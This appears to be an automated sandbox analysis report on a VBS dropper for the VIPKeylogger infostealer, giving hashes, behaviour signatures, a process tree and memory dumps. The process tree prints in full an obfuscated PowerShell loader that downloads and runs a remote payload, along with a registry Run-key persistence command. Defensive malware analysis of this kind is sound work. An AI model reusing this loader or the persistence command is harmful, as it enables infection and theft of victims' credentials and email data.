Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/02/2025, 08:55

General

  • Target

    AH72799_MINES SERVICES SURINAME N.V.vbs

  • Size

    66KB

  • MD5

    0413291a862dec930cbeacabe1f57e8c

  • SHA1

    264609925d33aa4a99dbf0246f0fd8680f94a8c7

  • SHA256

    4d2227e8ebf7c5711159c86ccd59d8007ca4ffc56d1d6d13c7bcb4494875756e

  • SHA512

    9595f534d657f39fd08df644bff62cb28d2eca57c17279e8df28f21a0fb094658cfebb2b3b5f83c060e7e80444d111e2938b907f42cffc807afcb73f291ca3cf

  • SSDEEP

    1536:apfuabI6RmNplnvrfKpI2ItF/6RH5UUYfD2:aW6RmVnTipgCRZSC

Malware Config

Extracted

Family

vipkeylogger

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

  • Vipkeylogger family
  • Blocklisted process makes network request 6 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AH72799_MINES SERVICES SURINAME N.V.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1860
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Monteverdi;function Haskwort($Fatshedera){ .($Scrofulorachitic89) ($Fatshedera)} function Trompetsneglenes($Blegsotigt){$furnishing=4;do{$Habilitetsgrunde+=$Blegsotigt[$furnishing];Format-List;$furnishing+=5} until(!$Blegsotigt[$furnishing])$Habilitetsgrunde}$Renvaskedes=Trompetsneglenes ' PicNOr,rENonht Med.Fa tw';$Renvaskedes+=Trompetsneglenes 'Jew eB edB tencDimoL ReiISkatESnipn agT';$sekarrenes=Trompetsneglenes 'DemeMVognoRakezAs,aiBrealKinelmulta Til/';$Flokinstinktet205=Trompetsneglenes ' G rT VejlFra sTolv1Pro.2';$Zoblers=' tnk[DdlkNS niEGramT,ake.Indissupee L,bR TolvDydsiR.mpCVisce cafpSperOVir IRustNAf,rtDan.mCuraAJazznHuncAPh tgFathe BybrSkr.].ele:Opiu:Engas ebEDimmc OliUForprFritId plt O ey FacP VinrStavo R pTByploConcCTendOCyprLErem=Fu d$NunaFTentlBackoAfmikHy eIPreoN e iSStattGodeIJ ednS.gnk BintBlueEBergTSild2Uafv0Vapo5';$sekarrenes+=Trompetsneglenes 'ev l5knip.Arbe0Pro .ina(TumuWToadi.ustnMilldEn,roOpnaw N ks en SinuNEddeTFire m.l1over0Fart. Ba 0 hy ;Numa PemoW amiNo snPhag6S bb4P ss;Enc Mi.xBest6 Unm4Flie;Mods nonfrPr cvInit:Teat1 Tho3Endo4Dige.Plas0 For)Dybl LeveGLunge ,decPantkReplo .io/ Sal2,edn0 ind1,ira0Subm0Gryd1Saer0 Spr1Apl ,ilFGokaiadvirFabreFrysfArmnoArn xBunn/Dump1Uns 3Styr4H ve. ort0';$Supersensitiveness=Trompetsneglenes 'F ruUchocs Sa e SedrSwan-FairA CilG ltrE ndenDataT';$Prges=Trompetsneglenes ' rieh scht ost fa pSolbsNedg:G im/Rean/VitrcSundaYaoufdetefSjlde UdtcIsochGruniGeniaForbnR mo.vaskcBorgo vermSams/SmoeiForgnVeruvTrip/MillO.echpV,sirTrepeBiditLasttampue rtilSequs uoye ProsSh caVacafSavegPiq iBasifRatitParfsBall.T ermArtusconti';$Playpen=Trompetsneglenes ' Rho>';$Scrofulorachitic89=Trompetsneglenes ' C oIDecae ketx';$Malvales='Vakkelvornes';$Sulpician='\Impropriator.fem';Haskwort (Trompetsneglenes 'Fors$Ju,dGSpejLSulloDet.BAutoACitrl Frk: E.uS BarYAksesAnthTSupee .vamCh rTIta,iRetop.nprn sm i.hecnBlokGBroc=Lage$LuciEFreqn ikv Tan: zigaShriP alopJourDTongASlictUdtnASymb+Quak$OrigSPreauI niLSupepAfseiPeteCChubiMunja Ly,N');Haskwort (Trompetsneglenes 'Paro$BalggSu cL.ikroUgerbL,sea Bemlloft:DellSProou oloB Su.M FreioverN T ri moSSliptPalprReguA PosNMyxoTFrim=Coun$DisopLimarcav,GForheSuveSFlle.Cl nSFal PPreplAal iHo dtopti(Tota$kamspMisclDegeA,ndeYSeptPFa iEpartNSpec)');Haskwort (Trompetsneglenes $Zoblers);$Prges=$Subministrant[0];$neons=(Trompetsneglenes 'Rest$Dep.Gc.sulBri OPassbInc AUnlelUn l:Sv,rAHaugE OpsS alaOOverN Tra=fixtNCro.eLgs WHort-T.skOPudsbBialj Ov E recThertK ll EyepsC.lcyPe,nSDwintCinneH lvm Rke.Orga$ ,egrWh.oeTilbNToxiv Sika So sMar kCo rEIsopd,ungE K ns');Haskwort ($neons);Haskwort (Trompetsneglenes 'A us$ForbANordetur sSlagoErucnHyle.CistH BoueStama,utsdEthne rofrJek sex t[ Ext$FormSNr suPalgpM,leeDrogrSubcsOmheeS ornLamps F.ri anntPseuiomravFil eUnban VejeU sts tyrsBez ]Bro =Feck$IncesCrageMah kKortaAllorEccarRu.oe.etanSkateShees');$Klubvrelse=Trompetsneglenes 'skel$ StaA AanefippsMotho.licnb ot.SkumD.utoo olw NepnUd,olfo,toUdf a AssdNoneFStori DoblR,pueKim,(Hind$SphaPAligrKunsgVi.ieMukks tre,Kass$OrdnFAktioUde rSpromU ria Pa,n NaudjimbsBun ptolvo RemsFordtshraeOrchr TrinSp re GansSa d)';$Formandsposternes=$Systemtipning;Haskwort (Trompetsneglenes 'Told$MetaGFimbLGad OUretB Beba llalBear:M ltiUpr N UovNBog uWarrMAvlieLe tR HusA InvB,ngrLHerdeCannnKasseSu,dsHamsS epu= il( CittRet,ElambsEksht Mul-bhojPanstANegetDow hTal For$T doFH reOTontrPol MUnvea SekNStoldH drsFlyvPFileO HybsS.imTTurreClamrSp rn MereOmveSLyss)');while (!$Innumerableness) {Haskwort (Trompetsneglenes 'Fina$CystgAnt lSu roJuleb,onia nprlJord:ElfeV verrDisadRougiD,sagkla.hBen,e.ofudPen.s StikPrebr DaraC.nsvP mpe NivnDer,eKl.i=garn$ShoaTFordo UmemOpsie,atcnCi.ctBjniu ntm') ;Haskwort $Klubvrelse;Haskwort (Trompetsneglenes 'Utro[AlmetEgochLetur biseVariACzarD ensISideNPostGHarm.IntetC.udHIndvrspekeSysta GruDSrge] Cob:,ona:RetrsSamslSak eP efethroPpoin( Rep4Grut0La d0 ard0Tr m)');Haskwort (Trompetsneglenes ' dle$DingGGra LBr,nO otoBSta aL,nilDemo:RangIkrllNBen,NC luuI famMusneBulbr HomAPignbEuphLLongElighnKiloekamuS iagSC ll=h lp(Klant StrE,ympsBevitAbor- SlepIdepaD sttCenthPla Mill$PhagfRaavO,arcrPianmRemaaFeriNG updSigmsNorepGua oBaths Foat M nE g.dR Tr NThy EHyp sCata)') ;Haskwort (Trompetsneglenes 'grsr$OvergC,wplFlleoTenaBA skaStaklLi t:Ko.dBSpleEBr.dsCo.gt.imiI A,oAGunpR blai SprA VilNLon = Dam$ HjeGS urlAnapot ndBLensaSlmmL Tff:SimpC.chlhCa pAOve uOkseFProcE errRImp sOnag+ Mis+I.on%,isp$Ur aSKanaU erbF.rsmTriaiindsNPenii a esBesmtNyskrA teAme,vNS,rkTDec,.R,accBeatOP niuFor,nMainT') ;$Prges=$Subministrant[$Bestiarian]}$Suctions=288784;$Skies=31348;Haskwort (Trompetsneglenes ' old$ Selg Moul obsorestBLektaMaa lCard:PossK BiraRea.TJ,gtAOrcinstrikMackeSildRSkra K lb= rs F.bGRanseHurtTBade-amblc hinoMidnn .arTVrlee EgeNGa,ntTose Sk a$ KonF TupobultRdireMForla RegnPozzd rotSL gppNilgOKands C.ptKrakE nybRFilmnFenaEFireS');Haskwort (Trompetsneglenes ' Tor$RickgPrmilGuldo aelbSojaaAktil Mal:hersHBegoeTalaiPh tdUdlgiNajeeTe n past=Demo Teks[ SkaS Runy TeksEd atRebbe npmUnpu.Gi sC JuroSeptnB.ndvCo teMi prMisetStat] ,et:Anbe:AntiFtierrFrouo LavmInduB .ndaUdrasClifec ll6 ros4PunkSRaa tPictr OveiR,ddnS eagSjle(Clea$LivsK T.raK llt,esoamonenTelekPapaeDemor agl)');Haskwort (Trompetsneglenes 'Hemo$DoceG PhyLSv joStembAbomAsmr lPlai:L,sbFHavfi ataBSynsE arorUnshSVegeP uftrKi lNArkeGUnpeNSt rI,awmN V.ggHa dEPearNFor.sKano Rein=Land Nyh [ Trasminky .tasRedntBaadESmaaMBek,.LipoTD plE parxStuetSid .Obj.EB,rgNSlagC avOSakrd e gIE.ecN BargPens] Ha :Fdre:So aA U.hSBu,gcFreeICakrI,tay.In dGZoneEAp oTLedsSPlimT estrGlosiImpaNAcriGSvbe(baga$Hed hSivnETro iMonodViviiLedse L.t)');Haskwort (Trompetsneglenes 'Doug$ TeogHjmoLSt gORbarBGrapa nesL cu : ,liB.seuR blO Fi WP umSFr ktTere=Plet$Aggrf SeriBi lBHun eBin R MedSNeofpImp R HolNFallg eodnSc eI binNGen gAuxeEAarrNstiksSkif.DonkS Bo.U DikBNon Svandt AsmrNemmiAlmenHaecGSkft( ali$skufSBlotu BjecUofftLiceiFjerO ,unNethisMuss,Hjti$Jenas,araKVen iUnfaeFlkksLand)');Haskwort $browst;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2340
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Monteverdi;function Haskwort($Fatshedera){ .($Scrofulorachitic89) ($Fatshedera)} function Trompetsneglenes($Blegsotigt){$furnishing=4;do{$Habilitetsgrunde+=$Blegsotigt[$furnishing];Format-List;$furnishing+=5} until(!$Blegsotigt[$furnishing])$Habilitetsgrunde}$Renvaskedes=Trompetsneglenes ' PicNOr,rENonht Med.Fa tw';$Renvaskedes+=Trompetsneglenes 'Jew eB edB tencDimoL ReiISkatESnipn agT';$sekarrenes=Trompetsneglenes 'DemeMVognoRakezAs,aiBrealKinelmulta Til/';$Flokinstinktet205=Trompetsneglenes ' G rT VejlFra sTolv1Pro.2';$Zoblers=' tnk[DdlkNS niEGramT,ake.Indissupee L,bR TolvDydsiR.mpCVisce cafpSperOVir IRustNAf,rtDan.mCuraAJazznHuncAPh tgFathe BybrSkr.].ele:Opiu:Engas ebEDimmc OliUForprFritId plt O ey FacP VinrStavo R pTByploConcCTendOCyprLErem=Fu d$NunaFTentlBackoAfmikHy eIPreoN e iSStattGodeIJ ednS.gnk BintBlueEBergTSild2Uafv0Vapo5';$sekarrenes+=Trompetsneglenes 'ev l5knip.Arbe0Pro .ina(TumuWToadi.ustnMilldEn,roOpnaw N ks en SinuNEddeTFire m.l1over0Fart. Ba 0 hy ;Numa PemoW amiNo snPhag6S bb4P ss;Enc Mi.xBest6 Unm4Flie;Mods nonfrPr cvInit:Teat1 Tho3Endo4Dige.Plas0 For)Dybl LeveGLunge ,decPantkReplo .io/ Sal2,edn0 ind1,ira0Subm0Gryd1Saer0 Spr1Apl ,ilFGokaiadvirFabreFrysfArmnoArn xBunn/Dump1Uns 3Styr4H ve. ort0';$Supersensitiveness=Trompetsneglenes 'F ruUchocs Sa e SedrSwan-FairA CilG ltrE ndenDataT';$Prges=Trompetsneglenes ' rieh scht ost fa pSolbsNedg:G im/Rean/VitrcSundaYaoufdetefSjlde UdtcIsochGruniGeniaForbnR mo.vaskcBorgo vermSams/SmoeiForgnVeruvTrip/MillO.echpV,sirTrepeBiditLasttampue rtilSequs uoye ProsSh caVacafSavegPiq iBasifRatitParfsBall.T ermArtusconti';$Playpen=Trompetsneglenes ' Rho>';$Scrofulorachitic89=Trompetsneglenes ' C oIDecae ketx';$Malvales='Vakkelvornes';$Sulpician='\Impropriator.fem';Haskwort (Trompetsneglenes 'Fors$Ju,dGSpejLSulloDet.BAutoACitrl Frk: E.uS BarYAksesAnthTSupee .vamCh rTIta,iRetop.nprn sm i.hecnBlokGBroc=Lage$LuciEFreqn ikv Tan: zigaShriP alopJourDTongASlictUdtnASymb+Quak$OrigSPreauI niLSupepAfseiPeteCChubiMunja Ly,N');Haskwort (Trompetsneglenes 'Paro$BalggSu cL.ikroUgerbL,sea Bemlloft:DellSProou oloB Su.M FreioverN T ri moSSliptPalprReguA PosNMyxoTFrim=Coun$DisopLimarcav,GForheSuveSFlle.Cl nSFal PPreplAal iHo dtopti(Tota$kamspMisclDegeA,ndeYSeptPFa iEpartNSpec)');Haskwort (Trompetsneglenes $Zoblers);$Prges=$Subministrant[0];$neons=(Trompetsneglenes 'Rest$Dep.Gc.sulBri OPassbInc AUnlelUn l:Sv,rAHaugE OpsS alaOOverN Tra=fixtNCro.eLgs WHort-T.skOPudsbBialj Ov E recThertK ll EyepsC.lcyPe,nSDwintCinneH lvm Rke.Orga$ ,egrWh.oeTilbNToxiv Sika So sMar kCo rEIsopd,ungE K ns');Haskwort ($neons);Haskwort (Trompetsneglenes 'A us$ForbANordetur sSlagoErucnHyle.CistH BoueStama,utsdEthne rofrJek sex t[ Ext$FormSNr suPalgpM,leeDrogrSubcsOmheeS ornLamps F.ri anntPseuiomravFil eUnban VejeU sts tyrsBez ]Bro =Feck$IncesCrageMah kKortaAllorEccarRu.oe.etanSkateShees');$Klubvrelse=Trompetsneglenes 'skel$ StaA AanefippsMotho.licnb ot.SkumD.utoo olw NepnUd,olfo,toUdf a AssdNoneFStori DoblR,pueKim,(Hind$SphaPAligrKunsgVi.ieMukks tre,Kass$OrdnFAktioUde rSpromU ria Pa,n NaudjimbsBun ptolvo RemsFordtshraeOrchr TrinSp re GansSa d)';$Formandsposternes=$Systemtipning;Haskwort (Trompetsneglenes 'Told$MetaGFimbLGad OUretB Beba llalBear:M ltiUpr N UovNBog uWarrMAvlieLe tR HusA InvB,ngrLHerdeCannnKasseSu,dsHamsS epu= il( CittRet,ElambsEksht Mul-bhojPanstANegetDow hTal For$T doFH reOTontrPol MUnvea SekNStoldH drsFlyvPFileO HybsS.imTTurreClamrSp rn MereOmveSLyss)');while (!$Innumerableness) {Haskwort (Trompetsneglenes 'Fina$CystgAnt lSu roJuleb,onia nprlJord:ElfeV verrDisadRougiD,sagkla.hBen,e.ofudPen.s StikPrebr DaraC.nsvP mpe NivnDer,eKl.i=garn$ShoaTFordo UmemOpsie,atcnCi.ctBjniu ntm') ;Haskwort $Klubvrelse;Haskwort (Trompetsneglenes 'Utro[AlmetEgochLetur biseVariACzarD ensISideNPostGHarm.IntetC.udHIndvrspekeSysta GruDSrge] Cob:,ona:RetrsSamslSak eP efethroPpoin( Rep4Grut0La d0 ard0Tr m)');Haskwort (Trompetsneglenes ' dle$DingGGra LBr,nO otoBSta aL,nilDemo:RangIkrllNBen,NC luuI famMusneBulbr HomAPignbEuphLLongElighnKiloekamuS iagSC ll=h lp(Klant StrE,ympsBevitAbor- SlepIdepaD sttCenthPla Mill$PhagfRaavO,arcrPianmRemaaFeriNG updSigmsNorepGua oBaths Foat M nE g.dR Tr NThy EHyp sCata)') ;Haskwort (Trompetsneglenes 'grsr$OvergC,wplFlleoTenaBA skaStaklLi t:Ko.dBSpleEBr.dsCo.gt.imiI A,oAGunpR blai SprA VilNLon = Dam$ HjeGS urlAnapot ndBLensaSlmmL Tff:SimpC.chlhCa pAOve uOkseFProcE errRImp sOnag+ Mis+I.on%,isp$Ur aSKanaU erbF.rsmTriaiindsNPenii a esBesmtNyskrA teAme,vNS,rkTDec,.R,accBeatOP niuFor,nMainT') ;$Prges=$Subministrant[$Bestiarian]}$Suctions=288784;$Skies=31348;Haskwort (Trompetsneglenes ' old$ Selg Moul obsorestBLektaMaa lCard:PossK BiraRea.TJ,gtAOrcinstrikMackeSildRSkra K lb= rs F.bGRanseHurtTBade-amblc hinoMidnn .arTVrlee EgeNGa,ntTose Sk a$ KonF TupobultRdireMForla RegnPozzd rotSL gppNilgOKands C.ptKrakE nybRFilmnFenaEFireS');Haskwort (Trompetsneglenes ' Tor$RickgPrmilGuldo aelbSojaaAktil Mal:hersHBegoeTalaiPh tdUdlgiNajeeTe n past=Demo Teks[ SkaS Runy TeksEd atRebbe npmUnpu.Gi sC JuroSeptnB.ndvCo teMi prMisetStat] ,et:Anbe:AntiFtierrFrouo LavmInduB .ndaUdrasClifec ll6 ros4PunkSRaa tPictr OveiR,ddnS eagSjle(Clea$LivsK T.raK llt,esoamonenTelekPapaeDemor agl)');Haskwort (Trompetsneglenes 'Hemo$DoceG PhyLSv joStembAbomAsmr lPlai:L,sbFHavfi ataBSynsE arorUnshSVegeP uftrKi lNArkeGUnpeNSt rI,awmN V.ggHa dEPearNFor.sKano Rein=Land Nyh [ Trasminky .tasRedntBaadESmaaMBek,.LipoTD plE parxStuetSid .Obj.EB,rgNSlagC avOSakrd e gIE.ecN BargPens] Ha :Fdre:So aA U.hSBu,gcFreeICakrI,tay.In dGZoneEAp oTLedsSPlimT estrGlosiImpaNAcriGSvbe(baga$Hed hSivnETro iMonodViviiLedse L.t)');Haskwort (Trompetsneglenes 'Doug$ TeogHjmoLSt gORbarBGrapa nesL cu : ,liB.seuR blO Fi WP umSFr ktTere=Plet$Aggrf SeriBi lBHun eBin R MedSNeofpImp R HolNFallg eodnSc eI binNGen gAuxeEAarrNstiksSkif.DonkS Bo.U DikBNon Svandt AsmrNemmiAlmenHaecGSkft( ali$skufSBlotu BjecUofftLiceiFjerO ,unNethisMuss,Hjti$Jenas,araKVen iUnfaeFlkksLand)');Haskwort $browst;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2000
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Accesses Microsoft Outlook profiles
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      • outlook_office_path
      • outlook_win_path
      PID:4856
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "neutronbombers" /t REG_EXPAND_SZ /d "%Saalskaaneres% -windowstyle 1 $Timbrel209=(gi 'HKCU:\Software\Dietary157\').GetValue('Nitrile');%Saalskaaneres% ($Timbrel209)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4576
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "neutronbombers" /t REG_EXPAND_SZ /d "%Saalskaaneres% -windowstyle 1 $Timbrel209=(gi 'HKCU:\Software\Dietary157\').GetValue('Nitrile');%Saalskaaneres% ($Timbrel209)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:3856

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    b2b50acfbc37d5bbf8085e3b38fd5c59

    SHA1

    97f91ea27e0be9b9f147548e936faff6365cf184

    SHA256

    28c4f1eaffff3596495fee89b52bf3536ce8cdf41b8c1717c48ab0cdc8c98828

    SHA512

    33df954d1a1cd8f7fa1224be30c9b438714248bf122c3ed9742d86bdb429aadb996e0d3fa38de5905a9b2c464657ff5c1f899a31372e42212832c4441e6541f0

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jmkkvkk1.y20.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Impropriator.fem

    Filesize

    416KB

    MD5

    69744afe5ed7766eb2c8408b43c5be6f

    SHA1

    a1df119996f05a9d3aeafb35a8793c2ee6c2d967

    SHA256

    7228e757b1852f34d6e3bdaf3c6de05abad4e2fab4bc4f9c37ec70a46e917c6c

    SHA512

    7ff94ee1fa4d479ce73c8369583089b03cd5a4b9e479c2f06df129e171343c80c86ff4c003ddb49286445993bd3ddb1d20601cb7da1aa670d95a35fa1be9e60f

  • memory/2000-38-0x0000000006350000-0x000000000636A000-memory.dmp

    Filesize

    104KB

  • memory/2000-43-0x0000000008740000-0x000000000E3F8000-memory.dmp

    Filesize

    92.7MB

  • memory/2000-40-0x0000000006E60000-0x0000000006E82000-memory.dmp

    Filesize

    136KB

  • memory/2000-41-0x0000000008190000-0x0000000008734000-memory.dmp

    Filesize

    5.6MB

  • memory/2000-19-0x0000000004890000-0x00000000048C6000-memory.dmp

    Filesize

    216KB

  • memory/2000-20-0x0000000004F30000-0x0000000005558000-memory.dmp

    Filesize

    6.2MB

  • memory/2000-21-0x0000000005590000-0x00000000055B2000-memory.dmp

    Filesize

    136KB

  • memory/2000-22-0x0000000005630000-0x0000000005696000-memory.dmp

    Filesize

    408KB

  • memory/2000-23-0x0000000005710000-0x0000000005776000-memory.dmp

    Filesize

    408KB

  • memory/2000-33-0x0000000005840000-0x0000000005B94000-memory.dmp

    Filesize

    3.3MB

  • memory/2000-37-0x0000000007560000-0x0000000007BDA000-memory.dmp

    Filesize

    6.5MB

  • memory/2000-36-0x0000000005E60000-0x0000000005EAC000-memory.dmp

    Filesize

    304KB

  • memory/2000-35-0x0000000005E10000-0x0000000005E2E000-memory.dmp

    Filesize

    120KB

  • memory/2000-39-0x00000000070E0000-0x0000000007176000-memory.dmp

    Filesize

    600KB

  • memory/2340-15-0x00007FFE9DF20000-0x00007FFE9E9E1000-memory.dmp

    Filesize

    10.8MB

  • memory/2340-0-0x00007FFE9DF23000-0x00007FFE9DF25000-memory.dmp

    Filesize

    8KB

  • memory/2340-10-0x000002A2F7030000-0x000002A2F7052000-memory.dmp

    Filesize

    136KB

  • memory/2340-18-0x00007FFE9DF20000-0x00007FFE9E9E1000-memory.dmp

    Filesize

    10.8MB

  • memory/2340-11-0x00007FFE9DF20000-0x00007FFE9E9E1000-memory.dmp

    Filesize

    10.8MB

  • memory/2340-12-0x00007FFE9DF20000-0x00007FFE9E9E1000-memory.dmp

    Filesize

    10.8MB

  • memory/4856-49-0x0000000000C00000-0x0000000001E54000-memory.dmp

    Filesize

    18.3MB

  • memory/4856-50-0x0000000000C00000-0x0000000000C4A000-memory.dmp

    Filesize

    296KB

  • memory/4856-48-0x0000000000C00000-0x0000000001E54000-memory.dmp

    Filesize

    18.3MB

  • memory/4856-51-0x0000000025CB0000-0x0000000025D4C000-memory.dmp

    Filesize

    624KB

  • memory/4856-53-0x0000000026900000-0x0000000026AC2000-memory.dmp

    Filesize

    1.8MB

  • memory/4856-54-0x0000000026050000-0x00000000260A0000-memory.dmp

    Filesize

    320KB

  • memory/4856-55-0x0000000027000000-0x000000002752C000-memory.dmp

    Filesize

    5.2MB

  • memory/4856-57-0x00000000267D0000-0x0000000026862000-memory.dmp

    Filesize

    584KB

  • memory/4856-58-0x0000000026740000-0x000000002674A000-memory.dmp

    Filesize

    40KB